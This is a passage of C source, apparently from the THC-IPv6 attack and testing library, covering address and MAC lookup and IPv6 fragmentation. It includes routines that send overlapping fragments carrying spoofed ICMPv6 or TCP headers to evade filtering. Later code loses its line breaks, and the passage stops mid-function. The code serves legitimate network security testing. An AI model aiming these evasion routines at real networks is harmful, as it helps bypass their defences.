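    if ((ptr2 = strchr(tmp, '%')) != NULL)
      *ptr2 = 0;
    if (*ptr == '[') {
      ptr++;
      if ((ptr2 = strchr(tmp, ']')) != NULL)
        *ptr2 = 0;
    }
  }

  memset(&glob_hints, 0, sizeof(glob_hints));
  glob_hints.ai_family = AF_INET6;

  if (getaddrinfo(ptr, NULL, &glob_hints, &glob_result) != 0)
    return NULL;

  /* every exit below goes through `done` so the addrinfo list is released */
  if (getnameinfo(glob_result->ai_addr, glob_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0)
    goto done;
  /* inet_pton() returns 0 for unparsable text and -1 only for a bad family */
  if (inet_pton(AF_INET6, out, &glob_in6) != 1)
    goto done;
  if ((ret_addr = malloc(16)) == NULL)
    goto done;
  memcpy(ret_addr, glob_in6.s6_addr, 16);

  if (debug)
    thc_dump_data(ret_addr, 16, "Target Resolve IPv6");

done:
  freeaddrinfo(glob_result);
  return ret_addr;
}

/*
 * Query the MTU of `interface` (default_interface when NULL) with the
 * SIOCGIFMTU ioctl.
 *
 * Returns the MTU, or -1 if the socket cannot be created or the ioctl fails.
 */
int thc_get_mtu(char *interface) {
  int s;
  struct ifreq ifr;

  if (interface == NULL)
    interface = default_interface;

  if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    return -1;

  memset(&ifr, 0, sizeof(ifr));
  snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);

  if (ioctl(s, SIOCGIFMTU, (int8_t *) & ifr) < 0) {
    close(s);                   /* do not leak the descriptor on failure */
    return -1;
  }
  close(s);

  if (debug)
    printf("DEBUG: MTU %d\n", ifr.ifr_mtu);

  return ifr.ifr_mtu;
}

unsigned char *thc_get_own_mac(char *interface) {
  int s;
  struct ifreq ifr;
  char *mac;

  if (interface == NULL)
    interface =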
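default_interface;

  if (_thc_ipv6_rawmode)
    return thc_ipv6_dummymac();

#if !defined (SIOCGIFHWADDR)
  struct ifaddrs *ifa, *ifx = NULL;
  struct sockaddr_dl *dl;

  if (getifaddrs(&ifa) != 0)
    return NULL;
  ifx = ifa;
  if ((mac = malloc(6)) == NULL) {
    freeifaddrs(ifx);
    return NULL;
  }

  while (ifa != NULL) {
    /* NOTE(review): every entry is read as a sockaddr_dl without looking at
       the address family first - confirm this is safe on the target OS */
    dl = (struct sockaddr_dl *) ifa->ifa_addr;
    if (dl != NULL) {
      if (debug)
        thc_dump_data(dl->sdl_data, dl->sdl_nlen, "Interface loop");
      if (dl->sdl_nlen > 0 && strncmp(interface, dl->sdl_data, dl->sdl_nlen) == 0) {
        memcpy(mac, LLADDR(dl), 6);
        break;
      }
    }
    ifa = ifa->ifa_next;
  }

  if (ifa == NULL) {
    freeifaddrs(ifx);
    free(mac);                  /* buffer was allocated before the search */
    return NULL;                // error: could not find requested interface.
  } else {
    freeifaddrs(ifx);
  }
#else /* SIOCGIFHWADDR */
  if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    return NULL;

  memset(&ifr, 0, sizeof(ifr));
  snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface);

  if (ioctl(s, SIOCGIFHWADDR, (int8_t *) & ifr) < 0) {
    close(s);                   /* do not leak the descriptor on failure */
    return NULL;
  }
  close(s);

  if ((mac = malloc(6)) == NULL)
    return NULL;
  memcpy(mac, &ifr.ifr_hwaddr.sa_data, 6);
#endif

  if (debug)
    thc_dump_data(mac, 6, "Own MAC address");

  return mac;
}

/*
 * Pick one of the IPv6 addresses configured on `interface` (default_interface
 * when NULL) by reading /proc/net/if_inet6.
 *
 * `prefer` selects the wanted scope (PREFER_LINK / PREFER_GLOBAL). When `dst`
 * is given, its first byte overrides `prefer` (0xfe selects PREFER_LINK,
 * 0xff drops `dst`, anything else selects PREFER_GLOBAL) and an address
 * sharing the prefix with `dst` wins. If the first pass finds nothing, the
 * file is read a second time with the preference flipped.
 *
 * Returns a malloc()ed 16-byte address owned by the caller, or NULL.
 */
unsigned char *thc_get_own_ipv6(char *interface, unsigned char *dst, int prefer) {
  char *myipv6;
  FILE *f;
  /* Layout: [0] scope, [1] prefix length, [2..33] 32 hex digits, [34] NUL.
     That is 35 bytes; the former size of 34 put the terminator written to
     index 34 one byte past the array. */
  unsigned char ipv6[35] = "", save[35] = "", tmpbuf[34], buf[1024], *tmpdst = NULL;
  int a, b, c, done = 0, picky = 0, orig_prefer = prefer;
  unsigned char tmpd, tmpb;
  char bla[16];
  size_t blen, ilen;

  if (interface == NULL)
    interface = default_interface;

  if (dst != NULL && dst[0] == 0xff)
    dst = NULL;
  if (dst != NULL && dst[0] == 0xfe)
    prefer = PREFER_LINK;
  if (dst != NULL && dst[0] != 0xfe)
    prefer = PREFER_GLOBAL;

  if (dst != NULL) {
    tmpdst = thc_ipv62string(dst);
    if (tmpdst == NULL)         /* the comparisons below dereference tmpdst */
      return NULL;
  }
  memset(save, 0, sizeof(save));
  ilen = strlen(interface);

  while (done < 2 && picky < 2) {
    if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) {
      fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n");
      free(tmpdst);
      return NULL;
    }

    if (picky == 1) {
      if (prefer == PREFER_GLOBAL)
        prefer = PREFER_LINK;
      else
        prefer = PREFER_GLOBAL;
    }

    while (done < 2 && fgets(buf, sizeof(buf), f) != NULL) {
      /* The interface name is matched against the end of the line (before
         the newline). NOTE(review): this is a suffix match, so a name that
         ends in `interface` also matches.
         A line shorter than the name would make the index wrap around. */
      blen = strlen((char *) buf);
      if (blen <= ilen || strncmp(interface, &buf[blen - ilen - 1], ilen) != 0)
        continue;

      /* Field widths keep %s inside tmpbuf[34] and bla[16]; lines that do
         not yield all five fields, a 32-digit address and a prefix length
         of at most 128 are skipped instead of being used half-parsed. */
      if (sscanf(buf, "%33s %x %x %x %15s", tmpbuf, &a, &b, &c, bla) != 5 || strlen((char *) tmpbuf) != 32 || b < 0 || b > 128)
        continue;

      if (c == prefer && done == 0) {
        ipv6[0] = c;            // scope type
        ipv6[1] = b;            // netmask
        memcpy(&ipv6[2], tmpbuf, 32);
        ipv6[34] = 0;
        if (dst == NULL)
          done = 2;
        else
          done = 1;
      }

      // if a destination was given, we always prefer the local ip which is in the same subnet of the target
      if (dst != NULL) {
        if (strncmp(tmpbuf, tmpdst, b / 4) == 0) {
          if (b % 4 > 0) {
            tmpb = tmpbuf[b / 4 + 1] >> (b % 4);
            tmpd = tmpdst[b / 4 + 1] >> (b % 4);
            if (tmpb == tmpd) {
              done = 2;
            }
          } else
            done = 2;

          if (done == 2) {
            if (debug)
              printf("DEBUG: Found local IPv6 address to destination\n");
            ipv6[0] = c;        // scope type
            ipv6[1] = b;        // netmask
            memcpy(&ipv6[2], tmpbuf, 32);
            ipv6[34] = 0;
          }
        }
      }

      // ensure that 2000::/3 and fc00::/7 is selected correctly
      if (done != 2 && dst != NULL) {
        if (((strncmp(tmpbuf, "fc", 2) == 0 || strncmp(tmpbuf, "fd", 2) == 0) && (strncmp(tmpdst, "fc", 2) == 0 || strncmp(tmpdst, "fd", 2) == 0))
            || ((tmpdst[0] == '2' || tmpdst[0] == '3') && (tmpbuf[0] == '2' || tmpbuf[0] == '3'))) {
          memcpy(save + 2, tmpbuf, 32);
          memset(ipv6, 0, sizeof(ipv6));
          done = 0;
        }
        /* NOTE(review): the second alternative requires tmpdst to start with
           "fc" AND "fd" at once, which can never hold; "||" was presumably
           intended. Left unchanged because it alters address selection. */
        if (save[2] == 0 && (((strncmp(tmpbuf, "fc", 2) == 0 || strncmp(tmpbuf, "fd", 2) == 0) && (tmpdst[0] == '2' || tmpdst[0] == '3'))
                             || ((strncmp(tmpdst, "fc", 2) == 0 && strncmp(tmpdst, "fd", 2) == 0) && (tmpbuf[0] == '2' || tmpbuf[0] == '3')))) {
          memcpy(save + 2, tmpbuf, 32);
          memset(ipv6, 0, sizeof(ipv6));
          done = 0;
        }
      }
    }
    fclose(f);
    picky++;

    if (done < 2 && strlen(&ipv6[2]) == 0 && strlen(&save[2]) > 0) {
      memcpy(ipv6, save, sizeof(ipv6));
      done = 2;
    }
  }

  if (strlen(&save[2]) > 0 && prefer == PREFER_GLOBAL && strncmp(ipv6 + 2, "fe80", 2) == 0) {
    memcpy(ipv6, save, sizeof(ipv6));
    done = 2;
  }

  if (strlen(&ipv6[2]) == 0) {
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Warning: no IPv6 address on interface defined\n");
    free(tmpdst);
    return NULL;
  }

  if (picky == 2 && orig_prefer != ipv6[0])
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Warning: unprefered IPv6 address had to be selected\n");

  free(tmpdst);
  tmpdst = thc_string2notation(&ipv6[2]);
  myipv6 = thc_resolve6(tmpdst);
  free(tmpdst);

  if (debug && myipv6 != NULL)
    thc_dump_data(myipv6, 16, "Own IPv6 address");

  return myipv6;
}

/*
 * Build the Ethernet multicast MAC for an IPv6 multicast address:
 * 33:33 followed by bytes 12-15 of `dst`.
 *
 * Returns thc_ipv6_dummymac() in raw mode, otherwise a malloc()ed 6-byte
 * buffer owned by the caller, or NULL if `dst` is NULL or the allocation
 * fails.
 */
unsigned char *thc_get_multicast_mac(unsigned char *dst) {
  unsigned char *mac;

  if (_thc_ipv6_rawmode)
    return thc_ipv6_dummymac();

  if (dst == NULL || (mac = malloc(6)) == NULL)
    return NULL;

  mac[0] = 0x33;
  mac[1] = 0x33;
  memcpy(&mac[2], dst + 12, 4);

  return mac;
}

/*
 * pcap callback: pick the link-layer address out of a captured ICMPv6
 * neighbor advertisement.
 *
 * `foo` is the caller's state buffer: bytes 7-22 hold the IPv6 address that
 * is being looked up. On a match foo[0] is set to 32 and bytes 1-6 receive
 * the MAC, taken from the link-layer address option (type 2, length 1) when
 * present, else from the source MAC of the frame.
 *
 * The frame comes off the wire and is untrusted, so every offset is checked
 * against the captured length before it is read.
 */
void thc_get_mac_from_sniff(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int off = 0, len = (int) header->caplen - 14;
  unsigned char *ptr = (unsigned char *) data + 14;

  if (do_hdr_size) {
    ptr += (do_hdr_size - 14);
    len -= (do_hdr_size - 14);
  }

  /* 40 bytes IPv6 header + 24 bytes advertisement is the minimum that can
     match; rejecting shorter captures here covers the ptr[0], ptr[6] and
     ptr[40] reads below */
  if (len < 64)
    return;

  if (do_hdr_size && (ptr[0] & 240) != 0x60)
    return;

  if (ptr[6] == NXT_FRAG) {
    if (ptr[40] == NXT_ICMP6)
      off = 8;
    else
      return;
  } else if (ptr[6] != NXT_ICMP6)
    return;

  /* length check now precedes the reads that depend on `off` */
  if (len < 64 + off)
    return;
  if (ptr[40 + off] != ICMP6_NEIGHBORADV)
    return;
  if (memcmp(ptr + 48 + off, foo + 7, 16) != 0)
    return;

  foo[0] = 32;
  /* the option occupies bytes 64+off .. 71+off, so `off` is part of the bound */
  if (len >= 72 + off && ptr[64 + off] == 2 && ptr[65 + off] == 1)
    memcpy(foo + 1, ptr + 66 + off, 6);
  else
    memcpy(foo + 1, data + 6, 6);
}

unsigned char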
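*thc_lookup_ipv6_mac(char *interface, unsigned char *dst) {
  /*
   * Resolve the MAC address of `dst` on the local link: send up to three
   * neighbor solicitations and watch a pcap handle (filter "ip6 and dst
   * <own address>") for up to two seconds after each one.
   *
   * Returns thc_ipv6_dummymac() in raw / pppoe / 6in4 / vlan mode, otherwise
   * a malloc()ed 6-byte buffer owned by the caller, or NULL if nothing
   * answered or a step failed.
   */
  unsigned char *mac = NULL;
  time_t curr;
  int count = 0, found = 0;
  /* resolved_mac: [0] "found" flag, [1..6] MAC, [7..22] address looked up */
  char string[64] = "ip6 and dst ", resolved_mac[23] = "", *p1, *p2, *mysrc;
  pcap_t *p;

  if (thc_socket < 0)
    thc_socket = thc_open_ipv6();

  if (_thc_ipv6_rawmode || do_pppoe || do_6in4 || do_hdr_vlan)
    return thc_ipv6_dummymac();
  if (dst == NULL)
    return NULL;
  if (interface == NULL)
    interface = default_interface;

  if ((p1 = thc_get_own_ipv6(interface, dst, PREFER_LINK)) == NULL)
    return NULL;
  mysrc = p1;

  if ((p2 = thc_ipv62notation(p1)) == NULL) {
    free(mysrc);                /* own address was leaked on this path */
    return NULL;
  }
  /* bounded append instead of strcat() into the fixed 64-byte filter */
  snprintf(string + strlen(string), sizeof(string) - strlen(string), "%s", p2);
  free(p2);

  memcpy(resolved_mac + 7, dst, 16);

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    free(mysrc);
    return NULL;
  }

  while (found == 0 && count < 3) {
    thc_neighborsol6(interface, mysrc, NULL, dst, NULL, NULL);
    curr = time(NULL);
    while (found == 0 && time(NULL) < curr + 2) {
      thc_pcap_check(p, (char *) thc_get_mac_from_sniff, resolved_mac);
      if (resolved_mac[0] != 0) {
        found = 1;
        if ((mac = malloc(6)) == NULL) {
          thc_pcap_close(p);    /* capture handle was leaked on this path */
          free(mysrc);
          return NULL;
        }
        memcpy(mac, resolved_mac + 1, 6);
      }
    }
    count++;
  }

  thc_pcap_close(p);
  free(mysrc);

  /* mac stays NULL when nobody answered; do not hand NULL to the dumper */
  if (debug && mac != NULL)
    thc_dump_data(mac, 6, "MAC address for packet target");

  return mac;
}

/* If the following looks like shit to you:
   This is code submitted by Dan Kaminsky with whom I bet that he is not
   able to code a 1 page function which extracts the mac address from the
   neighbor cache on linux - which is such a complex and horrible
   implementation.
   Well you get what you ask for - a function which will break once the
   interface even slightly changes ... but its 1 page.
 */
/*
 * Look `dst` (16-byte IPv6 address) up in the kernel neighbor cache over a
 * NETLINK_ROUTE socket.
 *
 * A fixed 20-byte request is sent and a single reply of at most 32768 bytes
 * is read. The reply is not parsed as netlink messages: it is searched for
 * the 16 address bytes and the 6 bytes at offset 16 + 4 behind the match
 * are taken as the MAC (presumably the link-layer attribute that follows
 * the address - the layout is assumed, not verified).
 *
 * Returns a malloc()ed 7-byte buffer (6-byte MAC plus a trailing 0) owned by
 * the caller, or NULL if the address is not found or a step fails.
 */
unsigned char *thc_look_neighborcache(unsigned char *dst) {
  int fd, gotsize, rcvbuf = 65535;
  socklen_t fromlen;
  struct sockaddr_nl nladdr;
  unsigned char buf[32768], *ptr, *found;
  /* netlink header: length 0x14, type 0x1e, flags 0x0301, sequence number,
     pid 0; followed by four zero bytes of payload */
  char blob[] = { 0x14, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x01, 0x03, 0xda, 0x0f, 0xb8, 0x43, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

  if (dst == NULL)
    return NULL;

  if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE)) < 0)
    return NULL;

  memset(&nladdr, 0, sizeof(struct sockaddr_nl));
  nladdr.nl_family = AF_NETLINK;
  /* buffer size and bind stay best effort, as before */
  setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf));
  bind(fd, (struct sockaddr *) &nladdr, sizeof(nladdr));

  if (sendto(fd, blob, sizeof(blob), 0, (struct sockaddr *) &nladdr, sizeof(nladdr)) < 0) {
    close(fd);
    return NULL;
  }

  fromlen = sizeof(nladdr);
  gotsize = recvfrom(fd, buf, sizeof(buf), 0, (struct sockaddr *) &nladdr, &fromlen);
  shutdown(fd, SHUT_RDWR);
  close(fd);

  /* a failed or empty read must not be used as a length below */
  if (gotsize <= 0)
    return NULL;

  if (debug)
    thc_dump_data(buf, gotsize, "Neighbor cache lookup result");

  if ((ptr = thc_memstr(buf, dst, gotsize, 16)) == NULL)
    return NULL;

  /* the MAC is read at a fixed distance behind the match; make sure those
     bytes are still inside what was received */
  if (ptr + 16 + 4 + 6 > buf + gotsize)
    return NULL;

  if ((found = malloc(7)) == NULL)
    return NULL;
  memcpy(found, ptr + 16 + 4, 6);
  found[6] = 0;

  return found;
}

int thc_is_dst_local(char *interface, unsigned char *dst) {
  int local = 0;
  FILE *f;
  unsigned char tmpbuf[34], buf[1024], *tmpdst = NULL;
  int a, b, c /*, found = 0, fd = -1 */ ;
  unsigned char tmpd, tmpb;
  char bla[16];

  if (thc_socket < 0)
    thc_socket = thc_open_ipv6();

  if (_thc_ipv6_rawmode || dst == NULL || do_pppoe || do_6in4 || do_hdr_vlan)
    return 0;
  if (interface == NULL)
    interface = default_interface;

  if (dst[0] == 0xff)           // multicast address ?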
return 1; if (dst[0] == 0xfe && dst[1] == 0x80) // link local return 1; tmpdst = thc_ipv62string(dst); if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %x %x %s", tmpbuf, &a, &b, &c, bla); if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) { local = 1; } } else local = 1; } } } fclose(f); if (debug) printf("DEBUG: is dst local: %d\n", local); free(tmpdst); return local; } unsigned char *thc_get_mac(char *interface, unsigned char *src, unsigned char *dst) { int local = 0; FILE *f; unsigned char tmpbuf[34], router1[34], router2[34], defaultgw[34] = "", buf[1024], *tmpdst = NULL; int a, b, c /*, found = 0, fd = -1 */ ; unsigned char tmpd, tmpb; char bla[16], *ret, *p1; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode || do_pppoe || do_6in4 || do_hdr_vlan) return thc_ipv6_dummymac(); if (dst == NULL) return NULL; if (interface == NULL) interface = default_interface; if (dst[0] == 0xff) // then its a multicast target return thc_get_multicast_mac(dst); tmpdst = thc_ipv62string(dst); if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %x %x %s", tmpbuf, &a, &b, &c, bla); if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) { local = 1; } } else local = 1; } } } fclose(f); if (debug) 
printf("DEBUG: is mac local: %d\n", local); if (!local) { if ((f = fopen("/proc/net/ipv6_route", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/ipv6_route does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %s %x %s %s", tmpbuf, &b, router1, &a, router2, bla); if (b > 0) { if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) local = 1; } else local = 1; } } else strcpy(defaultgw, router2); if (local == 1) { if (debug) printf("DEBUG: router found for %s: %s\n", tmpdst, router2); strcpy(tmpdst, router2); } } } if (local == 0 && strlen(defaultgw) > 0) { if (debug) printf("DEBUG: using default router for %s: %s\n", tmpdst, defaultgw); strcpy(tmpdst, defaultgw); local = 1; } if (local == 0) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: No idea where to route the packet to %s!\n", tmpdst); fclose(f); free(tmpdst); return NULL; } fclose(f); } p1 = thc_string2ipv6(tmpdst); if ((ret = thc_look_neighborcache(p1)) != NULL) { free(p1); free(tmpdst); return ret; } ret = thc_lookup_ipv6_mac(interface, p1); free(tmpdst); free(p1); return ret; } unsigned char *thc_inverse_packet(unsigned char *pkt, int pkt_len) { unsigned char tmp[16]; int type = -1, iptr = 0, checksum; char *src = &pkt[8], *dst = &pkt[24]; if (pkt == NULL) return NULL; pkt[7] = 255; // ttl memcpy(tmp, pkt + 8, 16); // reverse IP6 src and dst memcpy(pkt + 8, pkt + 24, 16); memcpy(pkt + 24, tmp, 16); if (pkt_len > 44) { type = pkt[6]; iptr = 40; } while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_PIM || type == NXT_ICMP6 || type == NXT_TCP || type == NXT_UDP || type == NXT_IP4 || type == NXT_IP4_RUDIMENTARY) { switch (type) { case NXT_ICMP6: if (pkt[iptr] == ICMP6_PINGREQUEST 
|| pkt[iptr] == ICMP6_PINGREPLY) pkt[iptr] = (pkt[iptr] == ICMP6_PINGREQUEST ? ICMP6_PINGREPLY : ICMP6_PINGREQUEST); else if (pkt[iptr] == ICMP6_NEIGHBORSOL || pkt[iptr] == ICMP6_NEIGHBORADV) pkt[iptr] = (pkt[iptr] == ICMP6_NEIGHBORSOL ? ICMP6_NEIGHBORADV : ICMP6_NEIGHBORSOL); else if (pkt[iptr] == ICMP6_ROUTERSOL || pkt[iptr] == ICMP6_ROUTERADV) pkt[iptr] = (pkt[iptr] == ICMP6_ROUTERSOL ? ICMP6_ROUTERADV : ICMP6_ROUTERSOL); else if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: ICMP6 type %d can not be inversed\n", type); pkt[iptr + 2] = 0; pkt[iptr + 3] = 0; checksum = checksum_pseudo_header(src, dst, NXT_ICMP6, &pkt[iptr], pkt_len - iptr); pkt[iptr + 2] = checksum / 256; pkt[iptr + 3] = checksum % 256; type = -1; break; case NXT_MIPV6: case NXT_PIM: case NXT_UDP: case NXT_TCP: case NXT_IP4: case NXT_IP4_RUDIMENTARY: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: inverse_packet has not implement type %d yet!\n", type); // fall through case NXT_NONXT: case NXT_DATA: case NXT_AH: case NXT_ESP: type = -1; // no processing of other headers break; case NXT_ROUTE: case NXT_FRAG: case NXT_HDR: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: inverse_packet has not implement type %d yet!\n", type); type = pkt[iptr]; iptr += (pkt[iptr + 1] + 1) * 8; if (iptr + 4 > pkt_len) { if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: packet to inverse is shorter than header tells me\n"); type = -1; } break; default: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Unsupported header type %d!\n", type); // XXX TODO FIXME : other packet types } } if (type != -1) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Unsupported header type %d!\n", type); if (debug) thc_dump_data(pkt, pkt_len, "Inversed Packet"); return pkt; } int thc_send_as_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); 
unsigned char buf[frag_len]; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (frag_len > mymtu - 48) frag_len = mymtu - 48; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 8; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes, sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, data + run * frag_len, frag_len); else memcpy(buf, data + run * frag_len, last_size); dptr += frag_len; run++; if (thc_add_data6(pkt, &pkt_len, type, buf, count == 1 ? 
last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); count--; } free(srcmac); free(dstmac); return 0; } // overlap_spoof_types: // -1 = icmpv6 toobig // 0 = icmpv6 echo request // 1-65535 = tcp (dst port) // int thc_send_as_overlapping_last_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); unsigned char buf[frag_len], *adata; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (overlap_spoof_type < -1 || overlap_spoof_type > 65535) { fprintf(stderr, "Error: invalid overlap_spoof_type: %d\n", overlap_spoof_type); return -1; } if (frag_len > mymtu - 56) // we need extra bytes for hdr, frag + overlap frag_len = mymtu - 56; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 24; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } if ((adata = malloc(data_len + frag_len + 8)) == NULL) { fprintf(stderr, "Error: unable to allocate %d bytes of memory\n", data_len + frag_len - 8); free(srcmac); free(dstmac); return -1; } memset(adata, 0, frag_len + 8); memcpy(adata + frag_len + 8, data, data_len); data_len += frag_len + 8; // only offset + length for pk2 #2 must be changed adata[0] = NXT_DST; adata[1] = ((frag_len - 16) / 8) - 1; if (overlap_spoof_type < 1) { adata[frag_len - 16] = NXT_ICMP6; adata[frag_len - 6] = getpid() % 256; // fake chksum for icmp adata[frag_len - 5] = getpid() / 256; if (overlap_spoof_type == 0) { adata[frag_len - 8] = ICMP6_PING; adata[frag_len - 1] = 1; // seq 1 } else { adata[frag_len - 8] = ICMP6_TOOBIG; adata[frag_len - 2] = 5; // mtu 1280 } } else { adata[frag_len - 16] = NXT_TCP; 
adata[frag_len - 8] = 44; // scrport adata[frag_len - 7] = 44; adata[frag_len - 6] = overlap_spoof_type / 256; // dstport adata[frag_len - 5] = overlap_spoof_type % 256; adata[frag_len - 4] = 1; adata[frag_len - 3] = getpid() % 256; // fake seq num adata[frag_len - 2] = getpid() % 256; // fake seq num adata[frag_len - 1] = 2; } adata[frag_len] = type; count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes (incl. spoof data), sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, adata + run * frag_len, frag_len); else memcpy(buf, adata + run * frag_len, last_size); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, count == 1 ? 
last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } dptr += frag_len; if (run == 0) dptr -= 16; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); run++; count--; } free(adata); free(srcmac); free(dstmac); return 0; } // overlap_spoof_types: // -1 = icmpv6 toobig // 0 = icmpv6 echo request // 1-65535 = tcp (dst port) // int thc_send_as_overlapping_first_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type) { unsigned char *pkt = NULL, *srcmac, *dstmac; int pkt_len, mymtu = thc_get_mtu(interface); unsigned char buf[frag_len], *adata; int count, id = time(NULL) % 2000000000, dptr = 0, last_size, run = 0; if (overlap_spoof_type < -1 || overlap_spoof_type > 65535) { fprintf(stderr, "Error: invalid overlap_spoof_type: %d\n", overlap_spoof_type); return -1; } if (frag_len > mymtu - 56) // we need extra bytes for hdr, frag + overlap frag_len = mymtu - 56; if (frag_len % 8 > 0) frag_len = (frag_len / 8) * 8; if (frag_len < 8) frag_len = 24; if ((srcmac = thc_get_own_mac(interface)) == NULL) return -1; if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { free(srcmac); return -1; } if ((adata = malloc(data_len + frag_len + 8)) == NULL) { fprintf(stderr, "Error: unable to allocate %d bytes of memory\n", data_len + frag_len - 8); free(srcmac); free(dstmac); return -1; } memset(adata, 0, frag_len + 8); memcpy(adata + frag_len + 8, data, data_len); data_len += frag_len + 8; // only offset + length for pk2 #2 must be changed adata[0] = NXT_DST; adata[1] = ((frag_len - 16) / 8) - 1; if (overlap_spoof_type < 1) { adata[frag_len - 16] = NXT_ICMP6; adata[frag_len - 6] = getpid() % 256; // fake chksum for icmp adata[frag_len - 5] = getpid() / 256; if (overlap_spoof_type == 0) { adata[frag_len - 8] = ICMP6_PING; adata[frag_len - 1] = 1; // seq 1 } else { adata[frag_len - 8] = ICMP6_TOOBIG; adata[frag_len - 2] = 5; 
